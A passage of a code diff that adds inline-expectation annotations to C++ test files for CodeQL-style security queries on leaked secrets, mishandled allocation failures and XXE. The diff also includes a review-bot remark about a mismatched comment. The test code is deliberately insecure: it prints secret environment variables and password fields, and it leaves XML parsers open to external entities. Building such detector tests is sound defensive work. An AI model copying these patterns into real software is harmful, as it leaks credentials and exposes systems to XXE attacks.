*call to getenv | This operation potentially exposes sensitive system data from $@. | tests.cpp:133:14:133:35 | *call to getenv | *call to getenv | -| tests.cpp:141:15:141:20 | *secret | tests.cpp:139:17:139:22 | *call to getenv | tests.cpp:141:15:141:20 | *secret | This operation potentially exposes sensitive system data from $@. 
| tests.cpp:139:17:139:22 | *call to getenv | *call to getenv | -| tests_passwd.cpp:18:29:18:31 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:18:29:18:31 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | -| tests_passwd.cpp:19:26:19:28 | *pwd | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | tests_passwd.cpp:19:26:19:28 | *pwd | This operation potentially exposes sensitive system data from $@. | tests_passwd.cpp:16:8:16:15 | *call to getpwnam | *call to getpwnam | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.qlref index 4f7305ce6970..fd804eefffa8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/PotentiallyExposedSystemData.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-497/PotentiallyExposedSystemData.ql \ No newline at end of file +query: Security/CWE/CWE-497/PotentiallyExposedSystemData.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests.cpp index 25a071bee467..cebf2d395e36 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests.cpp 
@@ -45,21 +45,21 @@ void test1() { std::ostream cout_copy = std::cout; - std::cout << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable - std::cerr << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable - std::clog << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable + std::cout << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable // $ Alert + std::cerr << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable // $ Alert + std::clog << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable // $ Alert someotherostream << getenv("SECRET_TOKEN"); // GOOD: not output cout_copy << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable [NOT DETECTED] std::cout << getenv("USERPROFILE"); // BAD: outputs PATH environment variable [NOT DETECTED] std::cout << getenv("PATH"); // BAD: outputs PATH environment variable [NOT DETECTED] - std::cout.write(getenv("SECRET_TOKEN"), strlen(getenv("SECRET_TOKEN"))); // BAD: outputs SECRET_TOKEN environment variable - (std::cout << "SECRET_TOKEN = ").write(getenv("SECRET_TOKEN"), strlen(getenv("SECRET_TOKEN"))); // BAD: outputs SECRET_TOKEN environment variable - std::cout.write("SECRET_TOKEN = ", 7) << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable + std::cout.write(getenv("SECRET_TOKEN"), strlen(getenv("SECRET_TOKEN"))); // BAD: outputs SECRET_TOKEN environment variable // $ Alert + (std::cout << "SECRET_TOKEN = ").write(getenv("SECRET_TOKEN"), strlen(getenv("SECRET_TOKEN"))); // BAD: outputs SECRET_TOKEN environment variable // $ Alert + std::cout.write("SECRET_TOKEN = ", 7) << getenv("SECRET_TOKEN"); // BAD: outputs SECRET_TOKEN environment variable // $ Alert } -char *global_token = getenv("SECRET_TOKEN"); +char *global_token = getenv("SECRET_TOKEN"); // $ Source char *global_other = "Hello, world!"; void test2(bool cond) 
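Review bot: In `test1`, the unchanged line `std::cout << getenv("USERPROFILE");` carries a comment saying it "outputs PATH environment variable", which does not match the variable it reads. Since the neighbouring lines are being annotated here, I would correct it to `// BAD: outputs USERPROFILE environment variable [NOT DETECTED]`, so the test says which environment value the query is expected to treat as sensitive.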
@@ -68,9 +68,9 @@ void test2(bool cond) maybe = cond ? global_token : global_other; - printf("token = '%s'\n", global_token); // BAD: outputs SECRET_TOKEN environment variable + printf("token = '%s'\n", global_token); // BAD: outputs SECRET_TOKEN environment variable // $ Alert printf("other = '%s'\n", global_other); - printf("maybe = '%s'\n", maybe); // BAD: may output SECRET_TOKEN environment variable + printf("maybe = '%s'\n", maybe); // BAD: may output SECRET_TOKEN environment variable // $ Alert } void test3() @@ -85,7 +85,7 @@ void test3() void myOutputFn(const char *msg) { - printf("%s", msg); + printf("%s", msg); // $ Alert } void myOtherFn(const char *msg) @@ -94,7 +94,7 @@ void myOtherFn(const char *msg) void test4() { - myOutputFn(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable + myOutputFn(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable // $ Alert Source myOtherFn(getenv("SECRET_TOKEN")); // GOOD: does not output anything. } @@ -108,7 +108,7 @@ void myOutputFn3(const char *msg) { const char *tmp = msg; - printf("%s", tmp); + printf("%s", tmp); // $ Alert } void myOutputFn4(const char *msg) 
@@ -116,29 +116,29 @@ void myOutputFn4(const char *msg) char buffer[4096]; sprintf(buffer, "log: %s\n", msg); - puts(buffer); + puts(buffer); // $ Alert } void myOutputFn5(const char *msg) { - printf("%s", msg); + printf("%s", msg); // $ Alert msg = ""; } void test5() { myOutputFn2(getenv("SECRET_TOKEN")); // GOOD: myOutputFn2 doesn't actually output the parameter - myOutputFn3(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable - myOutputFn4(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable - myOutputFn5(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable + myOutputFn3(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable // $ Source + myOutputFn4(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable // $ Source + myOutputFn5(getenv("SECRET_TOKEN")); // BAD: outputs the SECRET_TOKEN environment variable // $ Alert Source } void RtlZeroMemory(void* dst, size_t len); void test_clear_memory(char *username) { - char* secret = getenv("SECRET_TOKEN"); + char* secret = getenv("SECRET_TOKEN"); // $ Source - printf("%s", secret); // BAD + printf("%s", secret); // BAD // $ Alert RtlZeroMemory(secret, 1024); printf("%s", secret); // GOOD } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests_passwd.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests_passwd.cpp index 6de8ed84d061..3e3fd2158ce5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests_passwd.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-497/semmle/tests/tests_passwd.cpp 
@@ -13,9 +13,9 @@ void test6(char *username) { passwd *pwd; - pwd = getpwnam(username); + pwd = getpwnam(username); // $ Source - printf("pw_passwd = %s\n", pwd->pw_passwd); // BAD - printf("pw_dir = %s\n", pwd->pw_dir); // BAD + printf("pw_passwd = %s\n", pwd->pw_passwd); // BAD // $ Alert + printf("pw_dir = %s\n", pwd->pw_dir); // BAD // $ Alert printf("sizeof(passwd) = %i\n", sizeof(passwd)); // GOOD } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-570/IncorrectAllocationErrorHandling.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-570/IncorrectAllocationErrorHandling.qlref index fe4bb214bb47..10f5cbc30be5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-570/IncorrectAllocationErrorHandling.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-570/IncorrectAllocationErrorHandling.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-570/IncorrectAllocationErrorHandling.ql +query: Security/CWE/CWE-570/IncorrectAllocationErrorHandling.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-570/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-570/test.cpp index 9df901ca5a9f..f24875a137fa 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-570/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-570/test.cpp @@ -18,7 +18,7 @@ void *operator new(std::size_t, const std::nothrow_t &) noexcept; void *operator new[](std::size_t, const std::nothrow_t &) noexcept; void bad_new_in_condition() { - if (!(new int)) { // BAD + if (!(new int)) { // BAD // $ Alert return; } } 
@@ -26,53 +26,53 @@ void bad_new_in_condition() { void foo(int**); void bad_new_missing_exception_handling() { - int *p1 = new int[100]; // BAD + int *p1 = new int[100]; // BAD // $ Alert if (p1 == 0) return; - int *p2 = new int[100]; // BAD + int *p2 = new int[100]; // BAD // $ Alert if (!p2) return; - int *p3 = new int[100]; // BAD + int *p3 = new int[100]; // BAD // $ Alert if (p3 == NULL) return; - int *p4 = new int[100]; // BAD + int *p4 = new int[100]; // BAD // $ Alert if (p4 == nullptr) return; - int *p5 = new int[100]; // BAD + int *p5 = new int[100]; // BAD // $ Alert if (p5) {} else return; int *p6; - p6 = new int[100]; // BAD + p6 = new int[100]; // BAD // $ Alert if (p6 == 0) return; int *p7; - p7 = new int[100]; // BAD + p7 = new int[100]; // BAD // $ Alert if (!p7) return; int *p8; - p8 = new int[100]; // BAD + p8 = new int[100]; // BAD // $ Alert if (p8 == NULL) return; int *p9; - p9 = new int[100]; // BAD + p9 = new int[100]; // BAD // $ Alert if (p9 != nullptr) { } else return; int *p10; - p10 = new int[100]; // BAD + p10 = new int[100]; // BAD // $ Alert if (p10 != 0) { } int *p11; do { - p11 = new int[100]; // BAD + p11 = new int[100]; // BAD // $ Alert } while (!p11); int* p12 = new int[100]; @@ -89,11 +89,11 @@ void bad_new_missing_exception_handling() { void bad_new_nothrow_in_exception_body() { try { - new (std::nothrow) int[100]; // BAD - int *p1 = new (std::nothrow) int[100]; // BAD + new (std::nothrow) int[100]; // BAD // $ Alert + int *p1 = new (std::nothrow) int[100]; // BAD // $ Alert int *p2; - p2 = new (std::nothrow) int[100]; // BAD + p2 = new (std::nothrow) int[100]; // BAD // $ Alert } catch (const std::bad_alloc &) { } } @@ -157,7 +157,7 @@ struct Bar { void bad_placement_new_with_exception_handling() { char buffer[1024]; - try { new (buffer) Foo; } // BAD (placement new should not fail) + try { new (buffer) Foo; } // BAD (placement new should not fail) // $ Alert catch (...) { } } 
@@ -226,7 +226,7 @@ void good_new_with_throwing_call() { void bad_new_with_nonthrowing_call() { try { - int* p1 = new(std::nothrow) int; // BAD + int* p1 = new(std::nothrow) int; // BAD // $ Alert calls_non_throwing(p1); } catch(...) { } @@ -239,7 +239,7 @@ void bad_new_with_nonthrowing_call() { void bad_new_catch_baseclass_of_bad_alloc() { try { - int* p = new(std::nothrow) int; // BAD + int* p = new(std::nothrow) int; // BAD // $ Alert } catch(const std::exception&) { } } @@ -273,7 +273,7 @@ namespace qhelp { // BAD: the allocation will throw an unhandled exception // instead of returning a null pointer. void bad1(std::size_t length) noexcept { - int* dest = new int[length]; + int* dest = new int[length]; // $ Alert if(!dest) { return; } @@ -285,7 +285,7 @@ namespace qhelp { // instead return a null pointer. void bad2(std::size_t length) noexcept { try { - int* dest = new(std::nothrow) int[length]; + int* dest = new(std::nothrow) int[length]; // $ Alert std::memset(dest, 0, length); // ... } catch(std::bad_alloc&) { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected index 1376a03ce889..288e811fc737 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.expected 
@@ -1,3 +1,34 @@ +#select +| tests2.cpp:22:2:22:2 | *p | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:22:2:22:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:20:17:20:31 | call to SAXParser | XML parser | +| tests2.cpp:37:2:37:2 | *p | tests2.cpp:33:17:33:31 | call to SAXParser | tests2.cpp:37:2:37:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:33:17:33:31 | call to SAXParser | XML parser | +| tests2.cpp:51:2:51:2 | *p | tests2.cpp:49:12:49:12 | call to SAXParser | tests2.cpp:51:2:51:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:49:12:49:12 | call to SAXParser | XML parser | +| tests3.cpp:25:2:25:2 | *p | tests3.cpp:23:21:23:53 | *call to createXMLReader | tests3.cpp:25:2:25:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:23:21:23:53 | *call to createXMLReader | XML parser | +| tests3.cpp:38:2:38:6 | *p_3_3 | tests3.cpp:35:24:35:56 | *call to createXMLReader | tests3.cpp:38:2:38:6 | *p_3_3 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:35:24:35:56 | *call to createXMLReader | XML parser | +| tests3.cpp:56:2:56:6 | *p_3_5 | tests3.cpp:48:24:48:56 | *call to createXMLReader | tests3.cpp:56:2:56:6 | *p_3_5 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:48:24:48:56 | *call to createXMLReader | XML parser | +| tests3.cpp:63:2:63:2 | *p | tests3.cpp:60:21:60:53 | *call to createXMLReader | tests3.cpp:63:2:63:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:60:21:60:53 | *call to createXMLReader | XML parser | +| tests3.cpp:70:2:70:2 | *p | tests3.cpp:67:21:67:53 | *call to createXMLReader | tests3.cpp:70:2:70:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests3.cpp:67:21:67:53 | *call to createXMLReader | XML parser | +| tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | XML parser | +| tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | XML parser | +| tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:46:34:46:68 | ... \| ... | XML parser | +| tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:77:34:77:38 | flags | XML parser | +| tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | XML parser | +| tests5.cpp:29:2:29:2 | *p | tests5.cpp:27:25:27:38 | *call to createLSParser | tests5.cpp:29:2:29:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:27:25:27:38 | *call to createLSParser | XML parser | +| tests5.cpp:43:2:43:2 | *p | tests5.cpp:40:25:40:38 | *call to createLSParser | tests5.cpp:43:2:43:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests5.cpp:40:25:40:38 | *call to createLSParser | XML parser | +| tests5.cpp:59:2:59:2 | *p | tests5.cpp:55:25:55:38 | *call to createLSParser | tests5.cpp:59:2:59:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:55:25:55:38 | *call to createLSParser | XML parser | +| tests5.cpp:77:2:77:5 | *g_p2 | tests5.cpp:70:17:70:30 | *call to createLSParser | tests5.cpp:77:2:77:5 | *g_p2 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:70:17:70:30 | *call to createLSParser | XML parser | +| tests5.cpp:83:2:83:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:83:2:83:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | +| tests5.cpp:89:2:89:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:89:2:89:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | +| tests.cpp:17:2:17:2 | *p | tests.cpp:15:23:15:43 | call to XercesDOMParser | tests.cpp:17:2:17:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:15:23:15:43 | call to XercesDOMParser | XML parser | +| tests.cpp:31:2:31:2 | *p | tests.cpp:28:23:28:43 | call to XercesDOMParser | tests.cpp:31:2:31:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:28:23:28:43 | call to XercesDOMParser | XML parser | +| tests.cpp:39:2:39:2 | *p | tests.cpp:35:23:35:43 | call to XercesDOMParser | tests.cpp:39:2:39:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:35:23:35:43 | call to XercesDOMParser | XML parser | +| tests.cpp:56:2:56:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:56:2:56:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | +| tests.cpp:60:2:60:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:60:2:60:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | +| tests.cpp:69:2:69:2 | *p | tests.cpp:66:23:66:43 | call to XercesDOMParser | tests.cpp:69:2:69:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:66:23:66:43 | call to XercesDOMParser | XML parser | +| tests.cpp:80:2:80:2 | *p | tests.cpp:73:23:73:43 | call to XercesDOMParser | tests.cpp:80:2:80:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:73:23:73:43 | call to XercesDOMParser | XML parser | +| tests.cpp:88:3:88:3 | *q | tests.cpp:85:24:85:44 | call to XercesDOMParser | tests.cpp:88:3:88:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:85:24:85:44 | call to XercesDOMParser | XML parser | +| tests.cpp:104:3:104:3 | *q | tests.cpp:100:24:100:44 | call to XercesDOMParser | tests.cpp:104:3:104:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:100:24:100:44 | call to XercesDOMParser | XML parser | +| tests.cpp:113:2:113:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:113:2:113:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | +| tests.cpp:117:2:117:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:117:2:117:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | edges | tests2.cpp:20:17:20:31 | *new | tests2.cpp:22:2:22:2 | *p | provenance | | | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:20:17:20:31 | *new | provenance | | 
@@ -185,34 +216,3 @@ nodes | tests.cpp:128:18:128:18 | *q | semmle.label | *q | subpaths | tests.cpp:126:18:126:18 | *q | tests.cpp:112:39:112:39 | *p | tests.cpp:112:39:112:39 | *p | tests.cpp:126:18:126:18 | test10_doParseB output argument | -#select -| tests2.cpp:22:2:22:2 | *p | tests2.cpp:20:17:20:31 | call to SAXParser | tests2.cpp:22:2:22:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:20:17:20:31 | call to SAXParser | XML parser | -| tests2.cpp:37:2:37:2 | *p | tests2.cpp:33:17:33:31 | call to SAXParser | tests2.cpp:37:2:37:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:33:17:33:31 | call to SAXParser | XML parser | -| tests2.cpp:51:2:51:2 | *p | tests2.cpp:49:12:49:12 | call to SAXParser | tests2.cpp:51:2:51:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests2.cpp:49:12:49:12 | call to SAXParser | XML parser | -| tests3.cpp:25:2:25:2 | *p | tests3.cpp:23:21:23:53 | *call to createXMLReader | tests3.cpp:25:2:25:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:23:21:23:53 | *call to createXMLReader | XML parser | -| tests3.cpp:38:2:38:6 | *p_3_3 | tests3.cpp:35:24:35:56 | *call to createXMLReader | tests3.cpp:38:2:38:6 | *p_3_3 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:35:24:35:56 | *call to createXMLReader | XML parser | -| tests3.cpp:56:2:56:6 | *p_3_5 | tests3.cpp:48:24:48:56 | *call to createXMLReader | tests3.cpp:56:2:56:6 | *p_3_5 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:48:24:48:56 | *call to createXMLReader | XML parser | -| tests3.cpp:63:2:63:2 | *p | tests3.cpp:60:21:60:53 | *call to createXMLReader | tests3.cpp:63:2:63:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests3.cpp:60:21:60:53 | *call to createXMLReader | XML parser | -| tests3.cpp:70:2:70:2 | *p | tests3.cpp:67:21:67:53 | *call to createXMLReader | tests3.cpp:70:2:70:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests3.cpp:67:21:67:53 | *call to createXMLReader | XML parser | -| tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:26:34:26:48 | XML_PARSE_NOENT | XML parser | -| tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:36:34:36:50 | XML_PARSE_DTDLOAD | XML parser | -| tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | tests4.cpp:46:34:46:68 | ... \| ... | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:46:34:46:68 | ... \| ... | XML parser | -| tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | tests4.cpp:77:34:77:38 | flags | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:77:34:77:38 | flags | XML parser | -| tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests4.cpp:130:39:130:55 | XML_PARSE_DTDLOAD | XML parser | -| tests5.cpp:29:2:29:2 | *p | tests5.cpp:27:25:27:38 | *call to createLSParser | tests5.cpp:29:2:29:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests5.cpp:27:25:27:38 | *call to createLSParser | XML parser | -| tests5.cpp:43:2:43:2 | *p | tests5.cpp:40:25:40:38 | *call to createLSParser | tests5.cpp:43:2:43:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:40:25:40:38 | *call to createLSParser | XML parser | -| tests5.cpp:59:2:59:2 | *p | tests5.cpp:55:25:55:38 | *call to createLSParser | tests5.cpp:59:2:59:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:55:25:55:38 | *call to createLSParser | XML parser | -| tests5.cpp:77:2:77:5 | *g_p2 | tests5.cpp:70:17:70:30 | *call to createLSParser | tests5.cpp:77:2:77:5 | *g_p2 | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:70:17:70:30 | *call to createLSParser | XML parser | -| tests5.cpp:83:2:83:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:83:2:83:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | -| tests5.cpp:89:2:89:2 | *p | tests5.cpp:81:25:81:38 | *call to createLSParser | tests5.cpp:89:2:89:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests5.cpp:81:25:81:38 | *call to createLSParser | XML parser | -| tests.cpp:17:2:17:2 | *p | tests.cpp:15:23:15:43 | call to XercesDOMParser | tests.cpp:17:2:17:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:15:23:15:43 | call to XercesDOMParser | XML parser | -| tests.cpp:31:2:31:2 | *p | tests.cpp:28:23:28:43 | call to XercesDOMParser | tests.cpp:31:2:31:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:28:23:28:43 | call to XercesDOMParser | XML parser | -| tests.cpp:39:2:39:2 | *p | tests.cpp:35:23:35:43 | call to XercesDOMParser | tests.cpp:39:2:39:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests.cpp:35:23:35:43 | call to XercesDOMParser | XML parser | -| tests.cpp:56:2:56:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:56:2:56:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | -| tests.cpp:60:2:60:2 | *p | tests.cpp:51:23:51:43 | call to XercesDOMParser | tests.cpp:60:2:60:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:51:23:51:43 | call to XercesDOMParser | XML parser | -| tests.cpp:69:2:69:2 | *p | tests.cpp:66:23:66:43 | call to XercesDOMParser | tests.cpp:69:2:69:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:66:23:66:43 | call to XercesDOMParser | XML parser | -| tests.cpp:80:2:80:2 | *p | tests.cpp:73:23:73:43 | call to XercesDOMParser | tests.cpp:80:2:80:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:73:23:73:43 | call to XercesDOMParser | XML parser | -| tests.cpp:88:3:88:3 | *q | tests.cpp:85:24:85:44 | call to XercesDOMParser | tests.cpp:88:3:88:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:85:24:85:44 | call to XercesDOMParser | XML parser | -| tests.cpp:104:3:104:3 | *q | tests.cpp:100:24:100:44 | call to XercesDOMParser | tests.cpp:104:3:104:3 | *q | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:100:24:100:44 | call to XercesDOMParser | XML parser | -| tests.cpp:113:2:113:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:113:2:113:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. | tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | -| tests.cpp:117:2:117:2 | *p | tests.cpp:122:23:122:43 | call to XercesDOMParser | tests.cpp:117:2:117:2 | *p | This $@ is not configured to prevent an XML external entity (XXE) attack. 
| tests.cpp:122:23:122:43 | call to XercesDOMParser | XML parser | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.qlref index 866f8697cafe..185788f319dd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/XXE.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-611/XXE.ql +query: Security/CWE/CWE-611/XXE.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests.cpp index 51ae57f54d9d..2c0e719c39b8 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-611/tests.cpp @@ -12,9 +12,9 @@ class XercesDOMParser: public AbstractDOMParser { // --- void test1(InputSource &data) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test2(InputSource &data) { @@ -25,18 +25,18 @@ void test2(InputSource &data) { } void test3(InputSource &data) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new XercesDOMParser(); // $ Source p->setDisableDefaultEntityResolution(false); - p->parse(data); // BAD (parser not correctly configured) + p->parse(data); // BAD (parser not correctly configured) // $ Alert } void test4(InputSource &data) { - XercesDOMParser *p = new XercesDOMParser(); + XercesDOMParser *p = new 